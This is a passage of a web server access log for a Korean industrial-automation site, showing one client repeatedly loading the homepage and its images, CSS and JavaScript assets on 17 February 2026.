"/assets/js/i18n.js" [Client 222.117.41.51] [Length 20887] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:14 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:51:15 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10448] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:48 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10427] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:56:59 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:22:57:00 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10435] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:54 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:00:55 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:24 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10426] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:01:25 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/favicon.ico" [Client 222.117.41.51] [Length 194408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:22 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10426] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:04:22 +0000] - 304 304 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 10437] [Gzip 5.45] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/css/style.css" [Client 222.117.41.51] [Length 2582] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom3.png" [Client 222.117.41.51] [Length 2500626] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/honeywell-logo.svg" [Client 222.117.41.51] [Length 5020] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/BatchControl.png" [Client 222.117.41.51] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/i18n.js" [Client 222.117.41.51] [Length 20891] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800" [Client 222.117.41.51] [Length 1495918] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/bearing.png" [Client 222.117.41.51] [Length 2662740] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/instrument.png" [Client 222.117.41.51] [Length 346560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://www.hanmocnn.co.kr/" -[17/Feb/2026:23:04:42 +0000] - 200 200 - GET https www.hanmocnn.co.kr "/assets/images/ControlRoom7.png" [Client 222.117.41.51] [Length 2316603] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 